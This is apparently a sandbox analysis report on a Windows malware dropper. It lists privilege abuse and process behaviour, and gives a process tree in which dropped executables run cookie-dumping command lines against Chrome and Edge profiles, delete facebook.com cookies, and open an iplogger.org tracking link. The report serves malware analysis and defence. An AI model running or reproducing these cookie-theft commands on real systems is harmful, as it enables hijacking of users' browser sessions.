\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5300 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 135 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 142 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 347 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 352 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4512 WerFault.exe 4512 WerFault.exe 2184 msedge.exe 2184 msedge.exe 4676 msedge.exe 4676 msedge.exe 5340 WerFault.exe 5340 WerFault.exe 5456 identity_helper.exe 5456 identity_helper.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 5376 Installation.exe 4584 WerFault.exe 4584 WerFault.exe 1440 WerFault.exe 1440 WerFault.exe 4716 WerFault.exe 4716 WerFault.exe 5568 WerFault.exe 5568 WerFault.exe 5428 WerFault.exe 5428 WerFault.exe 4136 AdvancedRun.exe 4136 AdvancedRun.exe 4136 AdvancedRun.exe 4136 AdvancedRun.exe 500 WerFault.exe 500 WerFault.exe 1068 MsiExec.exe 1068 MsiExec.exe 656 WerFault.exe 656 WerFault.exe 4196 jfiag3g_gg.exe 4196 jfiag3g_gg.exe 2812 8fsyD3Gw2a2p5RQr7p20wmew.exe 2812 8fsyD3Gw2a2p5RQr7p20wmew.exe 2812 8fsyD3Gw2a2p5RQr7p20wmew.exe 2812 8fsyD3Gw2a2p5RQr7p20wmew.exe 6488 msedge.exe 6488 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3692 KRSetp.exe Token: SeRestorePrivilege 4512 WerFault.exe Token: SeBackupPrivilege 4512 WerFault.exe Token: SeBackupPrivilege 4512 WerFault.exe Token: SeTcbPrivilege 5420 svchost.exe Token: SeTcbPrivilege 5420 svchost.exe Token: SeTcbPrivilege 5420 svchost.exe Token: SeTcbPrivilege 5420 svchost.exe Token: SeTcbPrivilege 5420 svchost.exe Token: SeTcbPrivilege 5420 svchost.exe Token: SeDebugPrivilege 2812 8fsyD3Gw2a2p5RQr7p20wmew.exe Token: SeDebugPrivilege 5532 lu45MPPlSXDcE87FXpGzebNT.exe Token: SeDebugPrivilege 6076 installer.exe Token: SeDebugPrivilege 5356 tc7tx2PYATrMO3q1RR7JDgxh.exe Token: SeDebugPrivilege 4136 AdvancedRun.exe Token: SeDebugPrivilege 3384 qMn_tJPqi2r4PCGE4bJHiVBA.exe Token: SeImpersonatePrivilege 4136 AdvancedRun.exe Token: SeDebugPrivilege 5776 HzWqg9gjd5UML3kuFjfEhExk.exe Token: SeTcbPrivilege 1216 svchost.exe Token: SeTcbPrivilege 1216 svchost.exe Token: SeDebugPrivilege 548 4IiTX4vYv1b3qLdHmypJF56x.exe Token: SeDebugPrivilege 4944 5642277.exe Token: SeDebugPrivilege 1436 MsiExec.exe Token: SeDebugPrivilege 1272 xupkdoyrIX37kZkiYbuCg7XQ.exe Token: SeDebugPrivilege 1204 W6aLoR23mFu4mCrl5FGlu3hP.exe Token: SeDebugPrivilege 5312 pTMuLJ8Llt3ZAyIu_jKMDOT6.exe Token: SeDebugPrivilege 6084 4071221.exe Token: SeCreateTokenPrivilege 680 askinstall53.exe Token: SeAssignPrimaryTokenPrivilege 680 askinstall53.exe Token: SeLockMemoryPrivilege 680 askinstall53.exe Token: SeIncreaseQuotaPrivilege 680 askinstall53.exe Token: SeMachineAccountPrivilege 680 askinstall53.exe Token: SeTcbPrivilege 680 askinstall53.exe Token: SeSecurityPrivilege 680 askinstall53.exe Token: SeTakeOwnershipPrivilege 680 askinstall53.exe Token: SeLoadDriverPrivilege 680 askinstall53.exe Token: SeSystemProfilePrivilege 680 askinstall53.exe Token: SeSystemtimePrivilege 680 askinstall53.exe Token: SeProfSingleProcessPrivilege 680 askinstall53.exe Token: SeIncBasePriorityPrivilege 680 askinstall53.exe Token: SeCreatePagefilePrivilege 680 askinstall53.exe Token: SeCreatePermanentPrivilege 680 askinstall53.exe Token: SeBackupPrivilege 680 askinstall53.exe Token: SeRestorePrivilege 680 askinstall53.exe Token: SeShutdownPrivilege 680 askinstall53.exe Token: SeDebugPrivilege 680 askinstall53.exe Token: SeAuditPrivilege 680 askinstall53.exe Token: SeSystemEnvironmentPrivilege 680 askinstall53.exe Token: SeChangeNotifyPrivilege 680 askinstall53.exe Token: SeRemoteShutdownPrivilege 680 askinstall53.exe Token: SeUndockPrivilege 680 askinstall53.exe Token: SeSyncAgentPrivilege 680 askinstall53.exe Token: SeEnableDelegationPrivilege 680 askinstall53.exe Token: SeManageVolumePrivilege 680 askinstall53.exe Token: SeImpersonatePrivilege 680 askinstall53.exe Token: SeCreateGlobalPrivilege 680 askinstall53.exe Token: 31 680 askinstall53.exe Token: 32 680 askinstall53.exe Token: 33 680 askinstall53.exe Token: 34 680 askinstall53.exe Token: 35 680 askinstall53.exe Token: SeDebugPrivilege 4116 4411936.exe Token: SeDebugPrivilege 2200 Versiumresearch.exe Token: SeDebugPrivilege 5040 uGITRZ1Q5t0sp0tv9uZRib6I.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4676 msedge.exe 560 VUHljWwBSoWgPG29Im1iwYru.tmp 5936 Cleaner Installation.exe -
Suspicious use of SetWindowsHookEx 30 IoCs
pid Process 5376 Installation.exe 5276 Oryn26tHXTXfiJOgOUHgEWQC.exe 5436 chqsf1lkE_zkaAtdaYT5l3cV.exe 5568 lFiB_5K9hnEQX8DzFjlPBY31.exe 5548 gQfPleKPYUO3IgUyG6oZeDBE.exe 5464 2o84zq2hVylVfyFnNpUXwFWj.exe 5316 WHT3zTM8vyl0pN8u26LRRztd.exe 1012 AlCWTV1YvTp6RqX1w0rqo08a.exe 3024 customer3.exe 3324 VUHljWwBSoWgPG29Im1iwYru.exe 3080 md8_8eus.exe 5524 VXS2zUNs8c1vKDZu8VA8qxnQ.exe 1504 USk6VuEkJK4XsVXYU2D1C3Ec.exe 560 VUHljWwBSoWgPG29Im1iwYru.tmp 1428 jfiag3g_gg.exe 5996 USk6VuEkJK4XsVXYU2D1C3Ec.exe 5332 11111.exe 4136 AdvancedRun.exe 1692 11111.exe 6088 11111.exe 1680 11111.exe 5720 ufgaa.exe 4132 11111.exe 4196 jfiag3g_gg.exe 5900 Setup.exe 6048 MediaBurner2.exe 680 askinstall53.exe 1280 MediaBurner2.tmp 3036 U0Y0YKNIlEqdzGuVOYcdoS5u.exe 6776 schtasks.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4736 wrote to memory of 3692 4736 EB7233922891E1DAD0434FBD52623647.exe 88 PID 4736 wrote to memory of 3692 4736 EB7233922891E1DAD0434FBD52623647.exe 88 PID 4736 wrote to memory of 4676 4736 EB7233922891E1DAD0434FBD52623647.exe 91 PID 4736 wrote to memory of 4676 4736 EB7233922891E1DAD0434FBD52623647.exe 91 PID 4736 wrote to memory of 1540 4736 EB7233922891E1DAD0434FBD52623647.exe 92 PID 4736 wrote to memory of 1540 4736 EB7233922891E1DAD0434FBD52623647.exe 92 PID 4736 wrote to memory of 1540 4736 EB7233922891E1DAD0434FBD52623647.exe 92 PID 4676 wrote to memory of 764 4676 msedge.exe 94 PID 4676 wrote to memory of 764 4676 msedge.exe 94 PID 1540 wrote to memory of 3472 1540 Folder.exe 95 PID 1540 wrote to memory of 3472 1540 Folder.exe 95 PID 1540 wrote to memory of 3472 1540 Folder.exe 95 PID 3508 wrote to memory of 4584 3508 rUNdlL32.eXe 98 PID 3508 wrote to memory of 4584 3508 rUNdlL32.eXe 98 PID 3508 wrote to memory of 4584 3508 rUNdlL32.eXe 98 PID 4736 wrote to memory of 4360 4736 EB7233922891E1DAD0434FBD52623647.exe 100 PID 4736 wrote to memory of 4360 4736 EB7233922891E1DAD0434FBD52623647.exe 100 PID 4736 wrote to memory of 4360 4736 EB7233922891E1DAD0434FBD52623647.exe 100 PID 3700 wrote to memory of 4584 3700 WerFault.exe 98 PID 3700 wrote to memory of 4584 3700 WerFault.exe 98 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 1044 4676 msedge.exe 102 PID 4676 wrote to memory of 2184 4676 msedge.exe 103 PID 4676 wrote to memory of 2184 4676 msedge.exe 103 PID 4676 wrote to memory of 3800 4676 msedge.exe 104 PID 4676 wrote to memory of 3800 4676 msedge.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/19Pfw72⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdee0446f8,0x7ffdee044708,0x7ffdee0447183⤵PID:764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:23⤵PID:1044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:2184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:83⤵PID:3800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:13⤵PID:3928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:13⤵PID:4336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 /prefetch:83⤵PID:5412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:5456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:13⤵PID:5484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:13⤵PID:5536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4848 /prefetch:23⤵PID:6568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2536 /prefetch:13⤵PID:4596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:13⤵PID:4560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:13⤵PID:4616
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe" -a3⤵
- Executes dropped EXE
PID:3472
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"2⤵
- Executes dropped EXE
PID:4360 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 2443⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5340
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5376 -
C:\Users\Admin\Documents\UN3EZFKchIMnv6Dr0leoPKhx.exe"C:\Users\Admin\Documents\UN3EZFKchIMnv6Dr0leoPKhx.exe"3⤵
- Executes dropped EXE
PID:4940 -
C:\Users\Admin\Documents\UN3EZFKchIMnv6Dr0leoPKhx.exe"C:\Users\Admin\Documents\UN3EZFKchIMnv6Dr0leoPKhx.exe"4⤵PID:2688
-
-
-
C:\Users\Admin\Documents\hYoeE5hFqkEuvqhTjmw8MCmM.exe"C:\Users\Admin\Documents\hYoeE5hFqkEuvqhTjmw8MCmM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5368 -
C:\Users\Admin\Documents\hYoeE5hFqkEuvqhTjmw8MCmM.exeC:\Users\Admin\Documents\hYoeE5hFqkEuvqhTjmw8MCmM.exe4⤵PID:1436
-
-
-
C:\Users\Admin\Documents\Oryn26tHXTXfiJOgOUHgEWQC.exe"C:\Users\Admin\Documents\Oryn26tHXTXfiJOgOUHgEWQC.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5276 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5332
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1680
-
-
-
C:\Users\Admin\Documents\HzWqg9gjd5UML3kuFjfEhExk.exe"C:\Users\Admin\Documents\HzWqg9gjd5UML3kuFjfEhExk.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3404 -
C:\Users\Admin\Documents\HzWqg9gjd5UML3kuFjfEhExk.exeC:\Users\Admin\Documents\HzWqg9gjd5UML3kuFjfEhExk.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5776
-
-
-
C:\Users\Admin\Documents\9HA8AUzkSkABD1aTFreqdLQL.exe"C:\Users\Admin\Documents\9HA8AUzkSkABD1aTFreqdLQL.exe"3⤵
- Executes dropped EXE
PID:5696 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 2444⤵
- Suspicious use of SetThreadContext
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:656
-
-
-
C:\Users\Admin\Documents\WHT3zTM8vyl0pN8u26LRRztd.exe"C:\Users\Admin\Documents\WHT3zTM8vyl0pN8u26LRRztd.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5316
-
-
C:\Users\Admin\Documents\W6aLoR23mFu4mCrl5FGlu3hP.exe"C:\Users\Admin\Documents\W6aLoR23mFu4mCrl5FGlu3hP.exe"3⤵
- Executes dropped EXE
PID:5300 -
C:\Users\Admin\Documents\W6aLoR23mFu4mCrl5FGlu3hP.exeC:\Users\Admin\Documents\W6aLoR23mFu4mCrl5FGlu3hP.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1204
-
-
-
C:\Users\Admin\Documents\gQfPleKPYUO3IgUyG6oZeDBE.exe"C:\Users\Admin\Documents\gQfPleKPYUO3IgUyG6oZeDBE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5548 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 3044⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4716
-
-
-
C:\Users\Admin\Documents\2o84zq2hVylVfyFnNpUXwFWj.exe"C:\Users\Admin\Documents\2o84zq2hVylVfyFnNpUXwFWj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5464 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 2964⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1440
-
-
-
C:\Users\Admin\Documents\VXS2zUNs8c1vKDZu8VA8qxnQ.exe"C:\Users\Admin\Documents\VXS2zUNs8c1vKDZu8VA8qxnQ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5524 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5524 -s 2524⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5568
-
-
-
C:\Users\Admin\Documents\lFiB_5K9hnEQX8DzFjlPBY31.exe"C:\Users\Admin\Documents\lFiB_5K9hnEQX8DzFjlPBY31.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5568 -
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3080
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3024 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1692
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6088
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:5720
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4132
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6776
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵PID:6976
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7020
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵PID:3560
-
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"4⤵
- Executes dropped EXE
PID:4620 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1428
-
-
